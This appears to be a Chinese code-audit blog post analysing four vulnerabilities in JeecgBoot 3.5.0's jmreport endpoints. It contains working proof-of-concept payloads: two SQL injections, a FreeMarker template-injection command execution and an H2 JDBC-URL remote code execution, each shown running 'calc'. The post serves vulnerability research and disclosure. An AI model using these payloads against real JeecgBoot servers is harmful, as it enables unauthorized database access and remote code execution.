【代码审计】JeecgBoot-3.5.0 四处安全问题分析

目录

[/jmreport/qurestSql sql注入漏洞](#/jmreport/qurestSql sql注入漏洞)

[/jmreport/show sql注入漏洞](#/jmreport/show sql注入漏洞)

[/jmreport/queryFieldBySql SSTI注入漏洞](#/jmreport/queryFieldBySql SSTI注入漏洞)

[/jmreport/testConnection 打H2RCE](#/jmreport/testConnection 打H2RCE)


/jmreport/qurestSql sql注入漏洞

项目用的mybatis

关注这个类

首先从传入的JSON中提取apiSelectId字段值,作为参数被getById调用

返回的值是jimu_report_db表里查询的数据,id为用户传入的apiSelectId

比如传入apiSelectId为1316997232402231298,则返回包括db_dyn_sql语句:

select * from rep_demo_employee where id='${id}'

查询到的包含db_dyn_sql语句的查询结果和用户输入的JSON接着传入qurestechSql

首先将DbDynSql赋给var3,将id作为参数被list调用

list的实现

去查询jimu_report_db_param表

后续再合并外部参数:将调用方传入的 paramObject 全部放入 var5,若参数名冲突,外部参数会覆盖预设参数,比如这里就是去覆盖id预设参数1

只要将传入的id设置为恶意sql语句即可注入

select * from rep_demo_employee where id='${id}'

最终poc:

复制代码
{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select database())),1)) or '%%' like '"}

/jmreport/show sql注入漏洞

先是从用户传入的json中获取id,params参数,调用show方法

其中params也要是以一个JSON格式的形式去传

先去调用reportDao.get 从 jimu_report表 取到一个JimuReport对象

getDataById里再取JimuReport的id去从jimu_report_db里去找sql语句

最终poc:

复制代码
{
    "id":"961455b47c0b86dc961e90b5893bff05",
    "params":"{\"id\":\"1' or '%1%' like (updatexml(0x3a,concat(1,(select database())),1)) or '%%' like '\"}"
}

/jmreport/queryFieldBySql SSTI注入漏洞

最终会调用parseReportSql

不传paramArray的时候调用e.a

接着往下走

最后就是个FreeMarker模板渲染

打SSTI

复制代码
{
    "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"calc\")}"
}

/jmreport/testConnection 打H2RCE

poc:

复制代码
{
  "id": "1",
  "code": "dataSource1",
  "dbType": "H2",
  "dbDriver": "org.h2.Driver",
  "dbUrl": "jdbc:h2:mem:test;init=CREATE TRIGGER shell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\u000A\u0009java.lang.Runtime.getRuntime().exec('calc')\u000A$$",
  "dbName": "test",
  "dbUsername": "sa",
  "dbPassword": "",
  "connectTimes": 5
}
相关推荐
wangmengxxw32 分钟前
微服务-服务配置
java·运维·微服务·云计算·服务配置
GZ_TOGOGO37 分钟前
网络安全认证考取证书有哪些?
安全·web安全·网络安全·cisp
_院长大人_1 小时前
Spring Boot 客户端设计示例:自动刷新 Token 并重试接口调用(Springboot Starter 封装)
java·spring boot·后端
卷到起飞的数分1 小时前
19.Spring Boot原理1
java·spring boot·后端
消失的旧时光-19431 小时前
彻底理解 synchronized:实例锁、类锁与自定义锁的原理和最佳实践
java·开发语言
开源之眼1 小时前
github star 较多的Java双亲委派机制【类加载的核心内容加星】
java
编程火箭车1 小时前
【Java SE 基础学习打卡】19 运算符(中)
java·java入门·运算符·编程基础·赋值运算符·复合赋值·自增自减
是一个Bug1 小时前
Spring事件监听器源码深度解析
java·数据库·spring
蜂蜜黄油呀土豆1 小时前
ThreadLocal 深度解析:它解决了什么、原理是什么、如何正确使用(含代码与实战建议)
java·并发编程·内存泄漏·threadlocal